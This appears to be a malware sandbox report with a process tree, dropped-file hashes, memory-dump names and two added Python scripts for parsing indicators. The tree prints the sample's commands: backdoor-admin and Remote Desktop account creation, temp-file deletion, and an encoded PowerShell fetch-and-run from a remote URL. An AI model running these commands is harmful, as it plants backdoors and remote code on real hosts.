        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe (depth 5)
          Command line: cmd /c net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net.exe (depth 6)
            Command line: net start TermService
            Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\net1.exe (depth 7)
              Command line: C:\Windows\system32\net1 start TermService
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      - C:\Windows\system32\cmd.exe (depth 4)
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc 000000 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc WVXHFeyt /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc WVXHFeyt /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt /add
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc WVXHFeyt
  - C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc WVXHFeyt
    - C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
Downloads

- C:\Users\Admin\AppData\Local\Temp\RES2541.tmp
  MD5: 964caa4f02b9565510e15c5ea910775e
  SHA1: 5edbecc35dc0f60ac7bdc585f9fd5cfa01a1a4c1
  SHA256: 91046f2ea431347ad3b742a063d6e121b4c31f5178249270eb5af85d36a2df13
  SHA512: bb157a5259ed96e04cf46d97aed788e267351e2be6c13b0a6209add182d56d314813bb02f8ebbc41ac3f9ba288fc5dd6604930be0ac118bf6c97366193e99559

- C:\Users\Admin\AppData\Local\Temp\Setup.zip
  MD5: 36f178576dcb8db35d6f06448b1eb510
  SHA1: 62277c90cc2b1bb81b36571037afe5081b0605d5
  SHA256: 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
  SHA512: 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96

- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

- C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  MD5: 43473f4e719958639a9d89e5d8388999
  SHA1: ccb79eb606a23daa4b3ff8f996a2fbf281f31491
  SHA256: ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
  SHA512: 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

- C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.dll
  MD5: 471bdee090cb60e599f4a2d690d48217
  SHA1: d368e433a07f421a88241b7481c80c3fc223759a
  SHA256: a2e1a1b98b89f933e167713e797115e8abbe36e1442a439b3818fb54bd2bacf8
  SHA512: da02b03573279cf5208d2386a44a87bd6c1c04f0b549d381952898e4463f290aa9d1f6259d15a5d60208e36041dbdea8c68f0475993ed8e1f84311e738342fe5

- C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
  MD5: eaee663dfeb2efcd9ec669f5622858e2
  SHA1: 2b96f0d568128240d0c53b2a191467fde440fd93
  SHA256: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
  SHA512: 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
MD5 ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1 ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA256 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA512 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP
MD5 d003565ffac3c9d41df58b063e7ba3a0
SHA1 28134aeacf9867ce14300ff2376923de29161616
SHA256 b994ca66addbbc61e7c9959f17e3afac0132a32ced45e809f53ef993635d1363
SHA512 387c39aaf40125af803871e744970bcd2fa357a9e642b8d8a98f7e01ef128eab58543a4e1aa5d3540d2fbfc69c1d9c98c957eb5e2dce8a09dcab3ff3fcf3163d
-
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.0.cs
MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline
MD5 1bf5abca04dfa636d13c54b3fa9b3e86
SHA1 86b76191802aedaec09c009c39ed93fbcbea82c4
SHA256 77191771e93606772bdcd1707b337d80a76c7346ea0753d8d5ee2a98607d0826
SHA512 a295f20c3dc2a4dd18acb880940599ac275be1d4261e75c1b7ae2fee0fb28c6e65f23185e1f65179ac3467dd72769e4cc0ef2039cfc7b758aa6f355e0c1444bc
-
\Windows\Branding\mediasrv.png
MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.png
MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
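The dropped-file listing above is the raw IOC material an analyst takes away from this report, but the page exports it with each hash label fused to the value that follows it, and some entries appear twice. The script below is an added example, not part of the sandbox report or its tooling: it parses that listing (both the fused export form and a cleaned "LABEL value" form) into records, validates each digest by length and alphabet, removes repeated entries, and matches a local file's digests against the records so the same MD5/SHA1/SHA256/SHA512 set can be checked on a suspect host. SAMPLE is copied from the listing above (exe1.exe repeated, as the raw export repeats it, plus mediasrv.png); the function names and the record layout are this example's own.

```python
"""Parse a sandbox dropped-file hash listing into IOC records and match files against them.

Added example, not code from the sandbox report. SAMPLE below is a fragment of the
report's listing in the raw form in which the page exports it (labels fused to values);
the parser also accepts the cleaned "MD5 <hex>" form.
"""
import hashlib
import re

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# A label optionally followed (with or without whitespace) by its hex value.
LABEL_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s*([0-9a-fA-F]*)$")

SAMPLE = r"""
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
"""


def parse_listing(text):
    """Return a list of {"path", "MD5", "SHA1", "SHA256", "SHA512"} dicts, digests lower-cased."""
    records, cur, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        if pending:                      # value for a label that stood alone on the previous line
            cur[pending] = line.lower()
            pending = None
            continue
        m = LABEL_RE.match(line)
        if m and cur is not None:
            label, hexval = m.groups()
            if hexval:
                cur[label] = hexval.lower()
            else:
                pending = label
            continue
        if line.endswith("MD5"):         # raw export: "MD5" fused to the path, value on the next line
            cur = {"path": line[:-3].rstrip()}
            pending = "MD5"
        else:                            # cleaned listing: bare path, labelled hashes follow
            cur = {"path": line}
        records.append(cur)
    for rec in records:                  # reject truncated or mis-split digests before they become IOCs
        for label, n in HASH_LEN.items():
            v = rec.get(label)
            if v is None or not re.fullmatch(r"[0-9a-f]{%d}" % n, v):
                raise ValueError(f"{rec['path']}: bad or missing {label}")
    return records


def dedupe(records):
    """Drop entries repeated with the same path and SHA256; the same hash at two paths is kept."""
    seen = {}
    for rec in records:
        seen.setdefault((rec["path"], rec["SHA256"]), rec)
    return list(seen.values())


def hash_bytes(data):
    return {label: hashlib.new(label.lower(), data).hexdigest() for label in HASH_LEN}


def hash_file(path, chunk=1 << 20):
    hs = {label: hashlib.new(label.lower()) for label in HASH_LEN}
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            for h in hs.values():
                h.update(block)
    return {label: h.hexdigest() for label, h in hs.items()}


def match_digests(digest, records):
    """(path, all_four_agree) for each record whose SHA256 equals the file's SHA256.

    A SHA256 hit with a disagreeing MD5/SHA1 means the listing was transcribed wrongly.
    """
    return [(rec["path"], all(rec[l] == digest[l] for l in HASH_LEN))
            for rec in records if rec["SHA256"] == digest["SHA256"]]


def match_file(path, records):
    return match_digests(hash_file(path), records)
```

Feed the whole dropped-files section to parse_listing and run match_file over a directory of collected samples; a record that raises in the validation loop is one whose hash was cut or merged during export and should be re-read from the report before it is distributed as an indicator.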
memory/2396-119-0x0000000000000000-mapping.dmp
-
memory/2412-128-0x00000192D1BC5000-0x00000192D1BC6000-memory.dmp
Filesize 4KB
-
memory/2412-129-0x00000192D1BC6000-0x00000192D1BC7000-memory.dmp
Filesize 4KB
-
memory/2412-127-0x00000192D1BC3000-0x00000192D1BC5000-memory.dmp
Filesize 8KB
-
memory/2412-124-0x00000192D1E90000-0x00000192D213A000-memory.dmp
Filesize 2.7MB
-
memory/2412-123-0x00000192D1BC0000-0x00000192D1BC2000-memory.dmp
Filesize 8KB
-
memory/2412-118-0x0000000000000000-mapping.dmp
-
memory/2460-151-0x0000000000000000-mapping.dmp
-
memory/2684-358-0x0000000000000000-mapping.dmp
-
memory/3292-145-0x0000020B75CE3000-0x0000020B75CE5000-memory.dmp
Filesize 8KB
-
memory/3292-167-0x0000020B76760000-0x0000020B76761000-memory.dmp
Filesize 4KB
-
memory/3292-144-0x0000020B75F70000-0x0000020B75F71000-memory.dmp
Filesize 4KB
-
memory/3292-134-0x0000000000000000-mapping.dmp
-
memory/3292-143-0x0000020B75CE0000-0x0000020B75CE2000-memory.dmp
Filesize 8KB
-
memory/3292-166-0x0000020B763D0000-0x0000020B763D1000-memory.dmp
Filesize 4KB
-
memory/3292-158-0x0000020B75C90000-0x0000020B75C91000-memory.dmp
Filesize 4KB
-
memory/3292-139-0x0000020B75C40000-0x0000020B75C41000-memory.dmp
Filesize 4KB
-
memory/3292-160-0x0000020B75CE6000-0x0000020B75CE8000-memory.dmp
Filesize 8KB
-
memory/3292-165-0x0000020B75CE8000-0x0000020B75CE9000-memory.dmp
Filesize 4KB
-
memory/3500-142-0x0000000003140000-0x0000000003142000-memory.dmp
Filesize 8KB
-
memory/3500-130-0x0000000000000000-mapping.dmp
-
memory/3612-360-0x0000000000000000-mapping.dmp
-
memory/3700-359-0x0000000000000000-mapping.dmp
-
memory/3904-117-0x0000000005C00000-0x0000000005C01000-memory.dmp
Filesize 4KB
-
memory/3904-114-0x0000000000C90000-0x0000000000C91000-memory.dmp
Filesize 4KB
-
memory/3904-116-0x0000000005BC0000-0x0000000005BF1000-memory.dmp
Filesize 196KB
-
memory/3960-357-0x0000000000000000-mapping.dmp
-
memory/3972-154-0x0000000000000000-mapping.dmp
-
memory/4000-463-0x0000000000000000-mapping.dmp
-
memory/4000-369-0x0000000000000000-mapping.dmp
-
memory/4028-174-0x0000000000000000-mapping.dmp
-
memory/4028-223-0x0000021D06648000-0x0000021D0664A000-memory.dmp
Filesize 8KB
-
memory/4028-184-0x0000021D06643000-0x0000021D06645000-memory.dmp
Filesize 8KB
-
memory/4028-183-0x0000021D06640000-0x0000021D06642000-memory.dmp
Filesize 8KB
-
memory/4028-203-0x0000021D06646000-0x0000021D06648000-memory.dmp
Filesize 8KB
-
memory/4112-361-0x0000000000000000-mapping.dmp
-
memory/4124-362-0x0000000000000000-mapping.dmp
-
memory/4144-224-0x000001BE87CD0000-0x000001BE87CD2000-memory.dmp
Filesize 8KB
-
memory/4144-267-0x000001BE87CD8000-0x000001BE87CDA000-memory.dmp
Filesize 8KB
-
memory/4144-225-0x000001BE87CD3000-0x000001BE87CD5000-memory.dmp
Filesize 8KB
-
memory/4144-216-0x0000000000000000-mapping.dmp
-
memory/4144-266-0x000001BE87CD6000-0x000001BE87CD8000-memory.dmp
Filesize 8KB
-
memory/4148-368-0x0000000000000000-mapping.dmp
-
memory/4164-462-0x0000000000000000-mapping.dmp
-
memory/4216-367-0x0000000000000000-mapping.dmp
-
memory/4308-365-0x0000000000000000-mapping.dmp
-
memory/4328-366-0x0000000000000000-mapping.dmp
-
memory/4404-269-0x00000201FE4A0000-0x00000201FE4A2000-memory.dmp
Filesize 8KB
-
memory/4404-301-0x00000201FE4A6000-0x00000201FE4A8000-memory.dmp
Filesize 8KB
-
memory/4404-270-0x00000201FE4A3000-0x00000201FE4A5000-memory.dmp
Filesize 8KB
-
memory/4404-254-0x0000000000000000-mapping.dmp
-
memory/4404-302-0x00000201FE4A8000-0x00000201FE4AA000-memory.dmp
Filesize 8KB
-
memory/4428-370-0x0000000000000000-mapping.dmp
-
memory/4504-376-0x0000000000000000-mapping.dmp
-
memory/4508-375-0x0000000000000000-mapping.dmp
-
memory/4532-371-0x0000000000000000-mapping.dmp
-
memory/4552-372-0x0000000000000000-mapping.dmp
-
memory/4620-373-0x0000000000000000-mapping.dmp
-
memory/4644-374-0x0000000000000000-mapping.dmp
-
memory/4708-378-0x0000000000000000-mapping.dmp
-
memory/4752-377-0x0000000000000000-mapping.dmp
-
memory/4824-312-0x0000000000000000-mapping.dmp
-
memory/4844-313-0x0000000000000000-mapping.dmp
-
memory/4856-379-0x0000000000000000-mapping.dmp
-
memory/4864-314-0x0000000000000000-mapping.dmp
-
memory/4880-395-0x000001BBB9EA6000-0x000001BBB9EA8000-memory.dmp
Filesize 8KB
-
memory/4880-380-0x0000000000000000-mapping.dmp
-
memory/4880-391-0x000001BBB9EA0000-0x000001BBB9EA2000-memory.dmp
Filesize 8KB
-
memory/4880-392-0x000001BBB9EA3000-0x000001BBB9EA5000-memory.dmp
Filesize 8KB
-
memory/4880-446-0x000001BBB9EA8000-0x000001BBB9EA9000-memory.dmp
Filesize 4KB
-
memory/5044-351-0x0000000000000000-mapping.dmp
-
memory/5064-352-0x0000000000000000-mapping.dmp
-
memory/5096-355-0x0000000000000000-mapping.dmp
-
memory/5112-356-0x0000000000000000-mapping.dmp
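Each dump name above encodes the process id, a sequence number and, for memory.dmp entries, the start and end of the dumped region, so the stated Filesize can be cross-checked against the address range before the dumps are pulled for analysis (the entries with pid 4880, the powershell.exe that made the blocklisted requests in the signatures section, are the ones to fetch first). The script below is an added example, not part of the report: it parses the names, recomputes each region size, compares it with the stated value and groups the dumps per pid. SAMPLE is a subset of the listing above in the raw exported form (Filesize fused to the name); the parser also accepts the cleaned "Filesize 4KB" form. The rounding rule in fmt_size (whole KB below 1 MiB, otherwise MB to one decimal) is an assumption inferred from the values on the page, not a documented convention of the sandbox.

```python
"""Parse sandbox memory-dump names and check the stated size against the address range.

Added example, not code from the sandbox report. SAMPLE is copied from the report's
listing in raw exported form; fmt_size encodes an assumed rounding rule.
"""
import re
from collections import defaultdict

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp"
    r"(?:Filesize)?$"                      # raw export fuses the "Filesize" label to the name
)
SIZE_RE = re.compile(r"^\d+(?:\.\d+)?(?:KB|MB)$")

SAMPLE = """
memory/2396-119-0x0000000000000000-mapping.dmp
-
memory/2412-128-0x00000192D1BC5000-0x00000192D1BC6000-memory.dmpFilesize
4KB
-
memory/2412-127-0x00000192D1BC3000-0x00000192D1BC5000-memory.dmpFilesize
8KB
-
memory/2412-124-0x00000192D1E90000-0x00000192D213A000-memory.dmpFilesize
2.7MB
-
memory/3904-116-0x0000000005BC0000-0x0000000005BF1000-memory.dmpFilesize
196KB
-
"""


def fmt_size(nbytes):
    """Render a byte count the way the report appears to (assumption: KB below 1 MiB, else MB, 1 decimal)."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes // 1024}KB"


def parse_dumps(text):
    """Return one dict per dump: pid, idx, kind, start, end (None for mapping dumps), stated size."""
    lines = [l.strip() for l in text.splitlines() if l.strip() and l.strip() != "-"]
    entries, i = [], 0
    while i < len(lines):
        m = DUMP_RE.match(lines[i])
        if not m:
            raise ValueError(f"unexpected line: {lines[i]!r}")
        i += 1
        e = {
            "pid": int(m.group("pid")), "idx": int(m.group("idx")), "kind": m.group("kind"),
            "start": int(m.group("start"), 16),
            "end": int(m.group("end"), 16) if m.group("end") else None,
            "stated": None,
        }
        nxt = lines[i] if i < len(lines) else ""
        if nxt.startswith("Filesize"):       # cleaned form: "Filesize 4KB" on its own line
            nxt = nxt[len("Filesize"):].strip()
        if SIZE_RE.match(nxt):               # raw form: bare "4KB" on the line after the name
            e["stated"] = nxt
            i += 1
        entries.append(e)
    return entries


def check_sizes(entries):
    """(pid, idx, stated, computed) for every memory dump whose stated size disagrees with its range."""
    bad = []
    for e in entries:
        if e["kind"] != "memory" or e["stated"] is None:
            continue
        computed = fmt_size(e["end"] - e["start"])
        if computed != e["stated"]:
            bad.append((e["pid"], e["idx"], e["stated"], computed))
    return bad


def dumps_by_pid(entries):
    """Per-pid count of mapping and memory dumps and total bytes of dumped regions."""
    by = defaultdict(lambda: {"mapping": 0, "memory": 0, "bytes": 0})
    for e in entries:
        by[e["pid"]][e["kind"]] += 1
        if e["end"] is not None:
            by[e["pid"]]["bytes"] += e["end"] - e["start"]
    return dict(by)
```

Mapping dumps carry no address range and are skipped by check_sizes; a memory dump whose computed size differs from the stated one is a name that was altered or truncated on export and should be re-read from the report before its offsets are used.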